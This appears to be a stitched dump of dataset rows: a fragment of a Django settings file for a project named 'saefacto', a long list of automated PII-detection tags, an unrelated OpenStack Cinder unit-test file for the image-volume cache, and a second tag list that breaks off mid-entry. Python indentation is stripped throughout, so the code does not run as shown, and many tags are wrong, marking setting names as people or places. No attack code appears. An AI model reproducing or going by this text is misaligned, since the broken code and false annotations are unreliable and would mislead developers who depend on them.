EMAIL_HOST_USER = values.SecretValue(environ_prefix="", environ_name="SENDGRID_USERNAME")
EMAIL_PORT = values.IntegerValue(587, environ_prefix="", environ_name="EMAIL_PORT")
EMAIL_SUBJECT_PREFIX = values.Value('[saefacto] ', environ_name="EMAIL_SUBJECT_PREFIX")
EMAIL_USE_TLS = True
SERVER_EMAIL = EMAIL_HOST_USER
########## END EMAIL
########## TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
TEMPLATE_LOADERS = (
('django.template.loaders.cached.Loader', (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)),
)
########## END TEMPLATE CONFIGURATION
########## CACHING
    # Only do this here because, thanks to django-pylibmc-sasl and pylibmc, memcacheify is painful to install on windows.
try:
# See: https://github.com/rdegges/django-heroku-memcacheify
from memcacheify import memcacheify
CACHES = memcacheify()
except ImportError:
CACHES = values.CacheURLValue(default="memcached://127.0.0.1:11211")
########## END CACHING
########## Your production stuff: Below this line define 3rd party libary settings
########## DEBUG
DEBUG = values.BooleanValue(True)
TEMPLATE_DEBUG = DEBUG
########## END DEBUG
########## django-debug-toolbar
MIDDLEWARE_CLASSES = Common.MIDDLEWARE_CLASSES + ('debug_toolbar.middleware.DebugToolbarMiddleware',)
INSTALLED_APPS += ('debug_toolbar',)
INTERNAL_IPS = ('127.0.0.1',)
DEBUG_TOOLBAR_CONFIG = {
'DISABLE_PANELS': ['debug_toolbar.panels.redirects.RedirectsPanel'],
'SHOW_TEMPLATE_CONTEXT': True,
}
########## end django-debug-toolbar
#######################################################################################
# terribly ugly hack to make PyCharm recognize the libraries
# the code below will never be executed
if 1 == 2:
INSTALLED_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
# Admin
'django.contrib.admin',
'south', # Database migration helpers:
'crispy_forms', # Form layouts
'avatar', # for user avatars
'sitetree',
'sitetree_smartadmin',
'django_user_agents',
'statici18n', # javascript
'users', # custom users app
'core',
'main',
# Needs to come last for now because of a weird edge case between
# South and allauth
'allauth', # registration
'allauth.account', # registration
'allauth.socialaccount', # registration
)
########## END APP CONFIGURATION
########## MIDDLEWARE CONFIGURATION
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
########## END MIDDLEWARE CONFIGURATION
########## DEBUG
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
TEMPLATE_DEBUG = DEBUG
########## END DEBUG
########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
# In production, this is changed to a values.SecretValue() setting
SECRET_KEY = "CHANGEME!!!"
########## END SECRET CONFIGURATION
########## FIXTURE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
join(BASE_DIR, 'fixtures'),
)
########## END FIXTURE CONFIGURATION
########## EMAIL CONFIGURATION
EMAIL_BACKEND = values.Value('django.core.mail.backends.smtp.EmailBackend')
########## END EMAIL CONFIGURATION
########## MANAGER CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
        ('Fábio C. Barrionuevo da Luz', 'dummy@email.com'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
########## END MANAGER CONFIGURATION
########## DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
########## END DATABASE CONFIGURATION
########## CACHING
    # Do this here because, thanks to django-pylibmc-sasl and pylibmc, memcacheify is painful to install on windows.
# memcacheify is what's used in Production
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
########## END CACHING
########## GENERAL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone
TIME_ZONE = 'America/Los_Angeles'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'en-us'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
########## END GENERAL CONFIGURATION
########## TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
"allauth.account.context_processors.account",
"allauth.socialaccount.context_processors.socialaccount",
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.request',
# Your stuff: custom template context processers go here
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
TEMPLATE_DIRS = (
join(BASE_DIR, 'templates'),
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
# See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
########## END TEMPLATE CONFIGURATION
########## STATIC FILE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = join(os.path.dirname(BASE_DIR), 'staticfiles')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
join(BASE_DIR, 'static'),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
########## END STATIC FILE CONFIGURATION
########## MEDIA CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = join(BASE_DIR, 'media')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
########## END MEDIA CONFIGURATION
########## URL Configuration
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
########## End URL Configuration
########## AUTHENTICATION CONFIGURATION
AUTHENTICATION_BACKENDS = (
"django.contrib.auth.backends.ModelBackend",
"allauth.account.auth_backends.AuthenticationBackend",
)
# Some really nice defaults
ACCOUNT_AUTHENTICATION_METHOD = "username"
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = "mandatory"
########## END AUTHENTICATION CONFIGURATION
########## Custom user app defaults
# Select the correct user model
AUTH_USER_MODEL = "users.User"
LOGIN_REDIRECT_URL = "users:redirect"
########## END Custom user app defaults
########## SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = "slugify.slugify"
########## END SLUGLIFIER
########## LOGGING CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
########## END LOGGING CONFIGURATION
########## Your common stuff: Below this line define 3rd party libary settings
| 24,139 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application'], ['IP_ADDRESS', '127.0.0.1'], ['URL', "https://s3.amazonaws.com/%s/'"], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application'], ['PERSON', 'https://docs.djangoproject.com/en/dev/topics/settings/'], ['LOCATION', 'django.contrib.messages'], ['PERSON', 'LOCAL_APPS'], ['LOCATION', 'South'], ['PERSON', 'AuthenticationMiddleware'], ['PERSON', 'XFrameOptionsMiddleware'], ['NRP', 'SECRET_KEY'], ['PERSON', "Fábio C. Barrionuevo da Luz'"], ['PERSON', 'pylibmc memcacheify'], ['PERSON', 'LocMemCache'], ['LOCATION', 'CRISPY_TEMPLATE_PACK'], ['PERSON', 'MEDIA_ROOT'], ['URL', 'config.ws'], ['PERSON', 'EMAIL_PORT'], ['LOCATION', 'projetosgt'], ['PERSON', 'sae_db'], ['PERSON', 'INTERCEPT_REDIRECTS'], ['PERSON', 'SITETREE_MODEL_TREE_ITEM'], ['PERSON', 'SmartTreeItem'], ['NRP', 'SECRET_KEY'], ['DATE_TIME', 'this to 60 seconds'], ['NRP', 'SECURE_CONTENT_TYPE_NOSNIFF'], ['LOCATION', 'AWS_SECRET_ACCESS_KEY'], ['PERSON', 'AWS_STORAGE_BUCKET_NAME'], ['LOCATION', 'https://s3.amazonaws.com/%s/'], ['PERSON', 'EMAIL_PORT'], ['PERSON', 'SERVER_EMAIL = EMAIL_HOST_USER'], ['PERSON', 'pylibmc memcacheify'], ['PERSON', 'terrivelmente feio para fazer o Pycharm'], ['LOCATION', 'django.contrib.messages'], ['LOCATION', 'South'], ['PERSON', 'AuthenticationMiddleware'], ['PERSON', 'XFrameOptionsMiddleware'], ['NRP', 'SECRET_KEY'], ['PERSON', "Fábio C. 
Barrionuevo da Luz'"], ['PERSON', 'pylibmc memcacheify'], ['PERSON', 'LocMemCache'], ['LOCATION', 'CRISPY_TEMPLATE_PACK'], ['PERSON', 'MEDIA_ROOT'], ['URL', 'config.ws'], ['URL', 'https://docs.djangoproject.com/en/dev/topics/settings/'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/'], ['URL', 'http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#debug'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-debug'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#secret-key'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#admins'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#managers'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#databases'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#time-zone'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#language-code'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#site-id'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-tz'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs'], ['URL', 'http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-root'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#media-root'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#media-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#logging'], ['URL', 'http://docs.djangoproject.com/en/dev/topics/logging'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#databases'], ['URL', 'https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts'], ['URL', 'http://django-storages.readthedocs.org/en/latest/index.html'], ['URL', 'http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings'], ['URL', 'http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings'], ['URL', 'https://github.com/antonagestam/collectfast'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs'], ['URL', 'https://github.com/rdegges/django-heroku-memcacheify'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#debug'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-debug'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#secret-key'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#admins'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#managers'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#databases'], ['URL', 
'https://docs.djangoproject.com/en/dev/ref/settings/#time-zone'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#language-code'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#site-id'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-tz'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs'], ['URL', 'http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-root'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#media-root'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#media-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#logging'], ['URL', 'http://docs.djangoproject.com/en/dev/topics/logging'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'CallingFormat.SU'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'django.contrib.au'], ['URL', 'django.contrib.co'], ['URL', 'django.contrib.se'], ['URL', 'django.contrib.si'], ['URL', 'django.contrib.me'], ['URL', 'django.contrib.st'], ['URL', 'django.contrib.hu'], ['URL', 'django.contrib.ad'], ['URL', 'django.contrib.ad'], ['URL', 'allauth.ac'], ['URL', 'allauth.so'], ['URL', 'django.contrib.sessions.middleware.Se'], ['URL', 'django.middleware.common.Com'], ['URL', 'django.contrib.auth.middleware.Au'], ['URL', 'django.contrib.messages.middleware.Me'], ['URL', 'django.middleware.cl'], ['URL', 'agents.middleware.Us'], ['URL', 'values.Bo'], ['URL', 'values.Se'], ['URL', 'values.Va'], ['URL', 'django.core.mail.backends.sm'], ['URL', 'email.com'], ['URL', 'django.core.cache.ba'], ['URL', 'django.contrib.auth.co'], ['URL', 'processors.au'], ['URL', 'allauth.account.co'], ['URL', 'processors.ac'], ['URL', 'allauth.socialaccount.co'], ['URL', 'processors.so'], ['URL', 'django.core.co'], ['URL', 'processors.de'], ['URL', 'django.core.co'], ['URL', 'django.core.co'], ['URL', 'processors.me'], ['URL', 'django.core.co'], ['URL', 'processors.st'], ['URL', 'django.core.co'], ['URL', 'processors.tz'], ['URL', 'django.contrib.messages.co'], ['URL', 'processors.me'], ['URL', 'django.core.co'], ['URL', 'processors.re'], ['URL', 'django.template.loaders.fi'], ['URL', 'os.pa'], ['URL', 'django.contrib.staticfiles.finders.Fi'], ['URL', 'django.contrib.staticfiles.fi'], ['URL', 'django.contrib.auth.backends.Mo'], ['URL', 'allauth.account.au'], ['URL', 'backends.Au'], ['URL', 'users.Us'], ['URL', 'slugify.sl'], ['URL', 'django.utils.log.Re'], ['URL', 'django.utils.log.Ad'], ['URL', 'django.re'], ['URL', 'values.Bo'], ['URL', 'Common.IN'], ['URL', 'values.Va'], ['URL', 'django.core.mail.backends.co'], ['URL', 'toolbar.middleware.De'], ['URL', 'smartadmin.Sm'], ['URL', 'smartadmin.Sm'], ['URL', 'Common.IN'], ['URL', 'allauth.socialaccount.pro'], ['URL', 'allauth.socialaccount.providers.gi'], ['URL', 'values.Se'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'storages.ba'], ['URL', 'values.Se'], ['URL', 'values.Se'], ['URL', 'values.Se'], ['URL', 
'values.Va'], ['URL', 'email.com'], ['URL', 'values.Va'], ['URL', 'smtp.sendgrid.com'], ['URL', 'values.Se'], ['URL', 'values.Se'], ['URL', 'values.Int'], ['URL', 'values.Va'], ['URL', 'django.template.loaders.ca'], ['URL', 'django.template.loaders.fi'], ['URL', 'values.Ca'], ['URL', 'values.Bo'], ['URL', 'toolbar.middleware.De'], ['URL', 'toolbar.panels.redirects.Red'], ['URL', 'django.contrib.au'], ['URL', 'django.contrib.co'], ['URL', 'django.contrib.se'], ['URL', 'django.contrib.si'], ['URL', 'django.contrib.me'], ['URL', 'django.contrib.st'], ['URL', 'django.contrib.hu'], ['URL', 'django.contrib.ad'], ['URL', 'allauth.ac'], ['URL', 'allauth.so'], ['URL', 'django.contrib.sessions.middleware.Se'], ['URL', 'django.middleware.common.Com'], ['URL', 'django.contrib.auth.middleware.Au'], ['URL', 'django.contrib.messages.middleware.Me'], ['URL', 'django.middleware.cl'], ['URL', 'values.Se'], ['URL', 'values.Va'], ['URL', 'django.core.mail.backends.sm'], ['URL', 'email.com'], ['URL', 'django.core.cache.ba'], ['URL', 'django.contrib.auth.co'], ['URL', 'processors.au'], ['URL', 'allauth.account.co'], ['URL', 'processors.ac'], ['URL', 'allauth.socialaccount.co'], ['URL', 'processors.so'], ['URL', 'django.core.co'], ['URL', 'processors.de'], ['URL', 'django.core.co'], ['URL', 'django.core.co'], ['URL', 'processors.me'], ['URL', 'django.core.co'], ['URL', 'processors.st'], ['URL', 'django.core.co'], ['URL', 'processors.tz'], ['URL', 'django.contrib.messages.co'], ['URL', 'processors.me'], ['URL', 'django.core.co'], ['URL', 'processors.re'], ['URL', 'django.template.loaders.fi'], ['URL', 'os.pa'], ['URL', 'django.contrib.staticfiles.finders.Fi'], ['URL', 'django.contrib.staticfiles.fi'], ['URL', 'django.contrib.auth.backends.Mo'], ['URL', 'allauth.account.au'], ['URL', 'backends.Au'], ['URL', 'users.Us'], ['URL', 'slugify.sl'], ['URL', 'django.utils.log.Re'], ['URL', 'django.utils.log.Ad'], ['URL', 'django.re']] |
72 | # Copyright (C) 2015 Pure Storage, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from datetime import timedelta
import ddt
import mock
from oslo_utils import timeutils
from cinder import context as ctxt
from cinder.db.sqlalchemy import models
from cinder.image import cache as image_cache
from cinder import objects
from cinder import test
from cinder.tests.unit import fake_constants as fake
@ddt.ddt
class ImageVolumeCacheTestCase(test.TestCase):
def setUp(self):
super(ImageVolumeCacheTestCase, self).setUp()
self.mock_db = mock.Mock()
self.mock_volume_api = mock.Mock()
self.context = ctxt.get_admin_context()
self.volume = models.Volume()
vol_params = {'id': fake.VOLUME_ID,
'host': 'foo@bar#whatever',
'cluster_name': 'cluster',
'size': 0}
self.volume.update(vol_params)
self.volume_ovo = objects.Volume(self.context, **vol_params)
def _build_cache(self, max_gb=0, max_count=0):
cache = image_cache.ImageVolumeCache(self.mock_db,
self.mock_volume_api,
max_gb,
max_count)
cache.notifier = self.notifier
return cache
def _build_entry(self, size=10):
entry = {
'id': 1,
'host': 'test@foo#bar',
'cluster_name': 'cluster@foo#bar',
'image_id': 'PI:KEY',
'image_updated_at': timeutils.utcnow(with_timezone=True),
'volume_id': '70a599e0-31e7-49b7-b260-868f441e862b',
'size': size,
'last_used': timeutils.utcnow(with_timezone=True)
}
return entry
def test_get_by_image_volume(self):
cache = self._build_cache()
ret = {'id': 1}
volume_id = '70a599e0-31e7-49b7-b260-868f441e862b'
self.mock_db.image_volume_cache_get_by_volume_id.return_value = ret
entry = cache.get_by_image_volume(self.context, volume_id)
self.assertEqual(ret, entry)
self.mock_db.image_volume_cache_get_by_volume_id.return_value = None
entry = cache.get_by_image_volume(self.context, volume_id)
self.assertIsNone(entry)
def test_evict(self):
cache = self._build_cache()
entry = self._build_entry()
cache.evict(self.context, entry)
self.mock_db.image_volume_cache_delete.assert_called_once_with(
self.context,
entry['volume_id']
)
msg = self.notifier.notifications[0]
self.assertEqual('image_volume_cache.evict', msg['event_type'])
self.assertEqual('INFO', msg['priority'])
self.assertEqual(entry['host'], msg['payload']['host'])
self.assertEqual(entry['image_id'], msg['payload']['image_id'])
self.assertEqual(1, len(self.notifier.notifications))
@ddt.data(True, False)
def test_get_entry(self, clustered):
cache = self._build_cache()
entry = self._build_entry()
image_meta = {
'is_public': True,
'owner': '70a599e0-31e7-49b7-b260-868f441e862b',
'properties': {
'virtual_size': '1.7'
},
'updated_at': entry['image_updated_at']
}
(self.mock_db.
image_volume_cache_get_and_update_last_used.return_value) = entry
if not clustered:
self.volume_ovo.cluster_name = None
expect = {'host': self.volume.host}
else:
expect = {'cluster_name': self.volume.cluster_name}
found_entry = cache.get_entry(self.context,
self.volume_ovo,
entry['image_id'],
image_meta)
self.assertDictEqual(entry, found_entry)
(self.mock_db.
image_volume_cache_get_and_update_last_used.assert_called_once_with)(
self.context,
entry['image_id'],
**expect
)
msg = self.notifier.notifications[0]
self.assertEqual('image_volume_cache.hit', msg['event_type'])
self.assertEqual('INFO', msg['priority'])
self.assertEqual(entry['host'], msg['payload']['host'])
self.assertEqual(entry['image_id'], msg['payload']['image_id'])
self.assertEqual(1, len(self.notifier.notifications))
def test_get_entry_not_exists(self):
cache = self._build_cache()
image_meta = {
'is_public': True,
'owner': '70a599e0-31e7-49b7-b260-868f441e862b',
'properties': {
'virtual_size': '1.7'
},
'updated_at': timeutils.utcnow(with_timezone=True)
}
image_id = 'PI:KEY'
(self.mock_db.
image_volume_cache_get_and_update_last_used.return_value) = None
found_entry = cache.get_entry(self.context,
self.volume_ovo,
image_id,
image_meta)
self.assertIsNone(found_entry)
msg = self.notifier.notifications[0]
self.assertEqual('image_volume_cache.miss', msg['event_type'])
self.assertEqual('INFO', msg['priority'])
self.assertEqual(self.volume.host, msg['payload']['host'])
self.assertEqual(image_id, msg['payload']['image_id'])
self.assertEqual(1, len(self.notifier.notifications))
@mock.patch('cinder.objects.Volume.get_by_id')
def test_get_entry_needs_update(self, mock_volume_by_id):
cache = self._build_cache()
entry = self._build_entry()
image_meta = {
'is_public': True,
'owner': '70a599e0-31e7-49b7-b260-868f441e862b',
'properties': {
'virtual_size': '1.7'
},
'updated_at': entry['image_updated_at'] + timedelta(hours=2)
}
(self.mock_db.
image_volume_cache_get_and_update_last_used.return_value) = entry
mock_volume = mock.MagicMock()
mock_volume_by_id.return_value = mock_volume
found_entry = cache.get_entry(self.context,
self.volume_ovo,
entry['image_id'],
image_meta)
# Expect that the cache entry is not returned and the image-volume
# for it is deleted.
self.assertIsNone(found_entry)
self.mock_volume_api.delete.assert_called_with(self.context,
mock_volume)
msg = self.notifier.notifications[0]
self.assertEqual('image_volume_cache.miss', msg['event_type'])
self.assertEqual('INFO', msg['priority'])
self.assertEqual(self.volume.host, msg['payload']['host'])
self.assertEqual(entry['image_id'], msg['payload']['image_id'])
self.assertEqual(1, len(self.notifier.notifications))
def test_create_cache_entry(self):
cache = self._build_cache()
entry = self._build_entry()
image_meta = {
'updated_at': entry['image_updated_at']
}
self.mock_db.image_volume_cache_create.return_value = entry
created_entry = cache.create_cache_entry(self.context,
self.volume_ovo,
entry['image_id'],
image_meta)
self.assertEqual(entry, created_entry)
self.mock_db.image_volume_cache_create.assert_called_once_with(
self.context,
self.volume_ovo.host,
self.volume_ovo.cluster_name,
entry['image_id'],
entry['image_updated_at'].replace(tzinfo=None),
self.volume_ovo.id,
self.volume_ovo.size
)
def test_ensure_space_unlimited(self):
cache = self._build_cache(max_gb=0, max_count=0)
has_space = cache.ensure_space(self.context, self.volume)
self.assertTrue(has_space)
self.volume.size = 500
has_space = cache.ensure_space(self.context, self.volume)
self.assertTrue(has_space)
def test_ensure_space_no_entries(self):
cache = self._build_cache(max_gb=100, max_count=10)
self.mock_db.image_volume_cache_get_all.return_value = []
self.volume_ovo.size = 5
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertTrue(has_space)
self.volume_ovo.size = 101
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertFalse(has_space)
def test_ensure_space_need_gb(self):
cache = self._build_cache(max_gb=30, max_count=10)
mock_delete = mock.patch.object(cache, '_delete_image_volume').start()
entries = []
entry1 = self._build_entry(size=12)
entries.append(entry1)
entry2 = self._build_entry(size=5)
entries.append(entry2)
entry3 = self._build_entry(size=10)
entries.append(entry3)
self.mock_db.image_volume_cache_get_all.return_value = entries
self.volume_ovo.size = 15
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertTrue(has_space)
self.assertEqual(2, mock_delete.call_count)
mock_delete.assert_any_call(self.context, entry2)
mock_delete.assert_any_call(self.context, entry3)
def test_ensure_space_need_count(self):
cache = self._build_cache(max_gb=30, max_count=2)
mock_delete = mock.patch.object(cache, '_delete_image_volume').start()
entries = []
entry1 = self._build_entry(size=10)
entries.append(entry1)
entry2 = self._build_entry(size=5)
entries.append(entry2)
self.mock_db.image_volume_cache_get_all.return_value = entries
self.volume_ovo.size = 12
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertTrue(has_space)
self.assertEqual(1, mock_delete.call_count)
mock_delete.assert_any_call(self.context, entry2)
def test_ensure_space_need_gb_and_count(self):
cache = self._build_cache(max_gb=30, max_count=3)
mock_delete = mock.patch.object(cache, '_delete_image_volume').start()
entries = []
entry1 = self._build_entry(size=10)
entries.append(entry1)
entry2 = self._build_entry(size=5)
entries.append(entry2)
entry3 = self._build_entry(size=12)
entries.append(entry3)
self.mock_db.image_volume_cache_get_all.return_value = entries
self.volume_ovo.size = 16
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertTrue(has_space)
self.assertEqual(2, mock_delete.call_count)
mock_delete.assert_any_call(self.context, entry2)
mock_delete.assert_any_call(self.context, entry3)
def test_ensure_space_cant_free_enough_gb(self):
cache = self._build_cache(max_gb=30, max_count=10)
mock_delete = mock.patch.object(cache, '_delete_image_volume').start()
        # Note: _build_entry() returns a dict, so list(entry) would only
        # collect its keys; wrap the entry in a list instead.
        entries = [self._build_entry(size=25)]
self.mock_db.image_volume_cache_get_all.return_value = entries
self.volume_ovo.size = 50
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertFalse(has_space)
mock_delete.assert_not_called()
| 12,065 | [['PERSON', 'fake_constants'], ['LOCATION', 'TestCase'], ['PERSON', "msg['priority"], ['PERSON', "msg['priority"], ['PERSON', "msg['priority"], ['PERSON', 'mock_volume_by_id.return_value = mock_volume\n\n '], ['PERSON', "msg['priority"], ['PERSON', 'entry2'], ['PERSON', 'entry3 = self._build_entry(size=10'], ['PERSON', 'max_count=2'], ['PERSON', 'entry2'], ['PERSON', 'entry2'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['URL', 'cinder.im'], ['URL', 'self.mo'], ['URL', 'mock.Mo'], ['URL', 'self.mo'], ['URL', 'mock.Mo'], ['URL', 'self.co'], ['URL', 'ctxt.ge'], ['URL', 'self.co'], ['URL', 'cache.Im'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'cache.no'], ['URL', 'self.no'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'id.re'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'id.re'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.co'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'self.notifier.no'], ['URL', 